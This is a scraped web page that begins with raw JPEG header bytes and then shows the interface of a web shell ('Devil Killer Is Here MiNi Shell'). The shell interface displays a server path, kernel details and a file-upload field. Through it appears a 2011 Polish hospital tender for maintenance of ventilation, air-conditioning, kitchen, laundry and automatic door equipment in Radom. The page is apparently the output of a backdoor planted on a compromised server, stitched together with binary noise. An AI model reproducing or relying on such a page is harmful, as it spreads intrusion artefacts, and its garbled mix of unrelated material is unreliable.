JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111202/407964-N-2011.html

<p class="kh_header"><b>Radom: Świadczenie usług eksploatacyjno - konserwacyjnych dla instalacji i urządzeń wentylacji mechanicznej i klimatyzacji, urządzeń kuchennych, pralniczych, drzwi, bram automatycznych w obiektach Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 407964 - 2011; data zamieszczenia: 02.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług eksploatacyjno - konserwacyjnych dla instalacji i urządzeń wentylacji mechanicznej i klimatyzacji, urządzeń kuchennych, pralniczych, drzwi, bram automatycznych w obiektach Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług eksploatacyjno- konserwacyjnych dla instalacji i urządzeń wentylacji mechanicznej i klimatyzacji, urządzeń kuchennych, pralniczych, drzwi, bram automatycznych w obiektach Radomskiego Szpitala Specjalistycznego w rozbiciu na n/w części:
CZĘŚĆ NR 1- KONSERWACJA INSTALACJI URZADZEŃ WENTYLACJI MECHANICZNEJ I KLIMATYZACJI
I. Ogólny opis przedmiotu zamówienia
Przedmiotem zamówienia są wszelkie czynności zapewniające prawidłowe funkcjonowanie w ruchu ciągłym instalacji i urządzeń wentylacji mechanicznej i klimatyzacji w obiektach Szpitala
CZĘŚĆ NR 2 - KONSERWACJA URZĄDZEŃ KUCHENNYCH , PRALNICZYCH
I. Ogólny opis przedmiotu zamówienia
Przedmiotem zamówienia są wszelkie czynności zapewniające prawidłowe funkcjonowanie urządzeń kuchennych, pralniczych będących na wyposażeniu Radomskiego Szpitala Specjalistycznego:
CZĘŚĆ NR 3 - KONSERWACJA DRZWI I BRAM AUTOMATYCZNYCH
I. Ogólny opis przedmiotu zamówienia
Przedmiotem zamówienia są wszelkie czynności zapewniające prawidłowe funkcjonowanie w ruchu ciągłym drzwi i bram automatycznych oraz rogatek zewnętrznych w obiektach Szpitala:.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1, 50.72.00.00-8, 50.53.12.00-8, 50.53.00.00-9, 50.71.00.00-5, 50.71.20.00-9, 50.71.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże wykonanie w obiekcie szpitalnym bądź w innym obiekcie w ciągu ostatnich 3 lat:
dla części nr 1: świadczenie usług naprawczych, konserwacyjnych i eksploatacyjnych instalacji 
i urządzeń wentylacji mechanicznej i klimatyzacji przez okres minimum 1 roku potwierdzone pozytywną opinią zleceniodawcy.
dla część nr 2: świadczenie usług naprawczych, konserwacyjnych i eksploatacyjnych urządzeń kuchennych, pralniczych  przez okres minimum 1 roku potwierdzone pozytywną opinią zleceniodawcy.
dla części nr 3: świadczenie usług naprawczych, eksploatacyjno- konserwacyjnych drzwi 
i bram automatycznych w ruchu ciągłym przez okres minimum 1 roku potwierdzone pozytywną opinią zleceniodawcy
 Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części nr 1:
Wykonawca wykaże że dysponuje:
- urządzeniem do sprawdzania wycieków freonu,
- urządzeniem do odzyskiwania freonu (wraz z butlą)
- urządzeniem do sprawdzania ciśnień w instalacjach freonowych i uzupełnienia freonu
- urządzeniem do sprawdzania szczelności urządzeń gazowych wraz z informacją o podstawie dysponowania tymi zasobami.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.

Dotyczy części nr 2:
Wykonawca wykaże że dysponuje:
- kompletem urządzeń do spawania gazowego (stal, miedź),
- urządzeniem do sprawdzania szczelności instalacji gazowej wraz z informacją o podstawie dysponowania tymi zasobami.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże że dysponuje:
a) osobami w ilości wystarczającej - wg oświadczenia oferenta - do całodobowego zabezpieczenia eksploatacji w ruchu ciągłym ( pełnienie dyżurów stałych w godz. 7:00-15:00 w dni robocze na terenie Zamawiającego i całodobowa dyspozycyjność w przypadku awarii) co najmniej 2 osoby posiadające łącznie aktualne (w okresie trwania przedmiotu zamówienia)  uprawnienia kwalifikacyjne w zakresie eksploatacji i dozoru - Grupa 1 pkt: 2, 10; Grupa 2 pkt: 5;  Grupa 3 pkt.: 6, 10 (obsługa, konserwacja, remonty, montaż, pomiary) zgodnie z Rozporządzeniem MGPiPS 
z dnia 28.04.2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (tekst jedn. Dz.U.89 poz.828 z późn. zm) wraz z informacją o podstawie do dysponowania tymi osobami.
b) co najmniej 1 osobę posiadającą aktualne (w okresie trwania przedmiotu zamówienia)  uprawnienia kwalifikacyjne naprawy i obsługi technicznej urządzeń i instalacji chłodniczych zawierających substancje kontrolowane wg ustawy z dnia 20.04.2004r. o substancjach zubożających warstwę ozonową (tekst jedn. Dz. U. Nr 121 poz. 1263 z późn. zm.) wraz z informacją o podstawie do dysponowania tymi osobami.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.

Dotyczy części nr 2:
Wykonawca wykaże że dysponuje:
a) osobami w ilości wystarczającej - wg oświadczenia oferenta - do całodobowego zabezpieczenia eksploatacji w ruchu ciągłym w dyżurach stałych na terenie Zamawiającego co najmniej 1 osoba- posiadająca aktualne (w okresie trwania przedmiotu zamówienia)  uprawnienia kwalifikacyjne 
w zakresie eksploatacji oraz dozoru - Grupa 2 pkt: 1, 2, 4, 6, 7, 10; Grupa 3 pkt.: 6, 10, Grupa 1 pkt.2,10 (obsługa, konserwacja, remonty, montaż, pomiary) zgodnie z Rozporządzeniem MGPiPS z dnia 28.04.2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci (tekst jedn. Dz.U.89 poz.828 
z późn. zm) wraz z informacją o podstawie do dysponowania tymi osobami.
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów.

Dotyczy części nr 3: 
Wykonawca wykaże że dysponuje:
a) osobami w ilości wystarczającej- wg oświadczenia Wykonawcy - do całodobowego zabezpieczenia eksploatacji urządzeń i instalacji niskonapięciowych, teleinformatycznych (pełnienie dyżurów stałych w godz. 7.00-15.00 w dni robocze na terenie Zamawiającego oraz zapewnienie całodobowej dyspozycyjności w przypadku awarii) wraz z dozorem i organizacją pracy oraz regularne okresowe przeglądy i regulacje zgodnie z obowiązującymi przepisami i instrukcjami obsługi i eksploatacji urządzeń, posiadającymi łącznie n/w uprawnienia:
- uprawnienia kwalifikacyjne w zakresie eksploatacji i dozoru wg punktów Załącznika nr 1 do Rozporządzenia MGPiPS z 28.04.2003 ( D.U.89 poz. 828) Grupa 1 pkt-y 2, 10 
( obsługa, konserwacja, remonty, montaż, pomiary)
Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia na podstawie załączonych do oferty oświadczeń i dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>NIE DOTYCZY</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik.
2.	Wypełniony formularz oferty.
3.	Wypełniony formularz cenowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje  następujące zmiany treści umowy : 
a) w przypadku zmiany ilości urządzeń podanych w załącznikach  do umowy- w takiej sytuacji  ryczałt zmniejsza się lub zwiększa o wartość dodatkowych lub usuniętych urządzeń/ wyzwalaczy
b) w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa.
c) Przedmiotem zmian treści umowy mogą być również zmiany adresowe lub rejestrowe stron umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4 piętro III pokój 308 lub 313.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.12.2011 godzina 10:00, miejsce: Radomski Szpital Specjalistyczny 
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4 piętro III pokój 308 lub 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> KONSERWACJA INSTALACJI URZADZEŃ WENTYLACJI MECHANICZNEJ I KLIMATYZACJI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Ogólny opis przedmiotu zamówienia
Przedmiotem zamówienia są wszelkie czynności zapewniające prawidłowe funkcjonowanie 
w ruchu ciągłym instalacji i urządzeń wentylacji mechanicznej i klimatyzacji w obiektach Szpitala.
1. Wykaz podstawowych urządzeń i instalacji przedmiotu zamówienia:
a)	urządzenia - węzły wentylacji mechanicznej i klimatyzacji we wszystkich budynkach R.Sz.S. (centrale klimatyzacyjne i wentylacyjne, centralki i zasilanie c.t., agregaty 
i zasilanie chłodnicze, wentylatory, nagrzewnice, kanały, zasilanie elektryczne 
i sterowanie) bez wentylatorowni Bloku Operac. Chir. [tabela A]:
-	Bud. Główny - węzły (x4):
-	węzeł wentylacyjno-klimatyzacyjny -Zakład Diagnostyki Obrazowej, O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych 
w Chorobach Układu Krążenia
-	węzeł wentylacyjno-klimatyzacyjny -O/Anestezjologii i Intensywnej Terapii
-	węzeł wentylacyjno-klimatyzacyjny - O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia
-	agregat wody lodowej wraz ze skraplaczem zewn., modułem hydraulicznym 
i siecią wody lodowej dla -  Bloku Operacyjnego Chirurgicznego, O/Anestezjologii 
i Intensywnej Terapii, O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia
-	Izba Przyjęć (SOR) - węzeł wentylacyjno-klimatyzacyjny 
-	Bud. Pawilon O/Dializ/Dziecięcy- węzły wentylacyjne (x3): dializy, nefrologia, dziecięcy
-	O/Ginekologiczno-Położniczy nowy - węzły wentylacyjno-klimatyzacyjne (x9central+2agr.chł.+ct)
-	Centralne Medyczne Laboratorium Diagnostyczne z Laboratorium Analitycznym 
i Pracownią Serologii Transfuzjologicznej + Budynek Szwalni - centrale wentylacyjne (x8)
-	Budynek O/Obserwacyjno-Zakaźny z Odcinkiem 1 Dnia leczenia Chorób Wątroby 
i Zakład Opieki Długoterminowej z Zakładem Pielęgnacyjno-Opiekuńczym, Zakładem Opiekuńczo-Leczniczym i Hospicjum Stacjonarnym - centrale wentylacyjne (x4): zakaźny, zol
-	Budynek Przychodni Specjalistycznych i Dyrekcji ul. Lekarska 4 - węzły wentylacyjne (x1)

Tabela A - główne urządzenia z węzłów klimatyzacyjno - wentylacyjnych

L.p.	Miejsce zamontowania	Typ urządzenia
1.		Szpitalny Oddział Ratunkowy z Izbą Przyjęć	Agregat chłodu Cool G20MR-KB02P
2.		Blok Operacyjny Chirurgiczny z Centralną Sterylizatornią	Agregat wody lod. Windex WMM1202E z mod.hydr. 
i skrapl.zewn.
3.		-Zakład Diagnostyki Obrazowej
-O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia	Agregat chłodu Cool CBGE-2B45
4.		Przechowalnia zwłok szpital - bud.gł.	Agregat chłodu Aspera U (N)J9238GS ze skrapl. Embraco
5.		Zakład Patomorfologii	Agregaty chłodu szt.2 do komory KZR16
6.		Magazyn Żywnościowy	Agregat chłodu SAN 1-D8-2R-28KE-TFD
7.		O/Ginekologiczno-Położniczy(nowy)	Agregat wody lod. z mod.hydr. i zbiorn.buf. (x2)
8.		O/Dializ z Odcinkiem Nefrologii	Centrala went BS1 VBW Clima Gdynia
9.		O/Dializ z Odcinkiem Nefrologii	Centrala went CV-A VTS Clima
10.		O/Anestezjologii i Intensywnej Terapii	Centrala went/klim MCK4 Klimor Gdynia
11.		Szpitalny Oddział Ratunkowy z Izbą Przyjęć	Centrala went/klim MCK3L/P25 Inwent Lublin
12.		O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia	Centrala went/klim CV-P VTS Clima
13.		O/Dziecięcy z Odcinkiem Pediatrii 1 Dnia	Centralka went VX (szt.2) Koss
14.		O/Obserwacyjno-Zakaźny z odcinkiem 1 Dnia Leczenia Chorób Wątroby	Centrala went (x2) CV VTS Clima
15.		Zakład Opieki Długoterminowej z Zakładem Pielęgnacyjno-Opiekuńczym, Zakładem Opiekuńczo-Leczniczym i Hospicjum Stacjonarnym	Centrala went (x2) VTS Clima
16.		-Zakład Diagnostyki Obrazowej
-O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia	Centrala went/klim VTS Clima
17.		-Centralne Medyczne Laboratorium Diagnostyczne z Laboratorium Analitycznym i Pracownią Serologii Transfuzjologicznej
-Budynek Sortowni (Dział Administracyjno-Gospodarczy)	Centrale went (x8) Klimor Gdynia
18.		O/Ginekologiczno-Położniczy (nowy)	Centrala went/klim (x5) Clima Produst
19.		O/Ginekologiczno-Położniczy (nowy)	Centrala went (x4) Clima Product
20.		O/Ginekologiczno-Położniczy (nowy)	Wymiennik JAD
21.		Piwnica w Budynku Głównym	Wymiennik JAD

b)	urządzenia wentylacji i klimatyzacji mech. miejscowe (tabela B)
-	klimatyzatory lokalne

Tabela B - klimatyzatory lokalne

L.p.	Miejsce zamontowania klimatyzatora	Marka i typ klimatyzatora
1.		Centralne Medyczne Laboratorium Diagnostyczne z Laboratorium Analitycznym i Pracownią Serologii Transfuzjologicznej	Acson   A4LC30CR FFFA
2.			Acson   A4LC25CR AFCA
3.			Lennox GHM 09 NLA
4.			Lennox GHM 09 NLA
5.		Zakład Patomorfologii	Fujitsu  ASY18E
6.		O/Ortopedyczno - Urazowy	Akaj AC-GS18HR
7.		O/Ortopedyczno - Urazowy	Tadiran TNL-20H
8.		Dział Informatyki	Tadiran TNL-20H
9.		Dział Informatyki	Tadiran GFL-S200H
10.		Sekcja Dok. i Ruchu Chorych	Lennox GHM 09 NLA
11.		Lab. - Pracownia Serologii	Polair ASW-H12A4
12.		Lab. - Pracownia Serologii	Polair ASW-H12A4
13.		Lab. - Pracownia Serologii	Polair ASW-H12A4
14.		Zakład Diagnostyki Obrazowej	Fuji Electric RD - 25U/RO-25U
15.			Galant AUS - 24H53R23064
16.			Lennox GHM12N
17.			Tadiran GXL200HD
18.		-Zakład Diagnostyki Obrazowej
- O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia 	Tadiran GFL-S150H
19.		RTG Poradnia Ortopedyczna	Tadiran TNLS11
20.		O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia	Acson A4LC10B
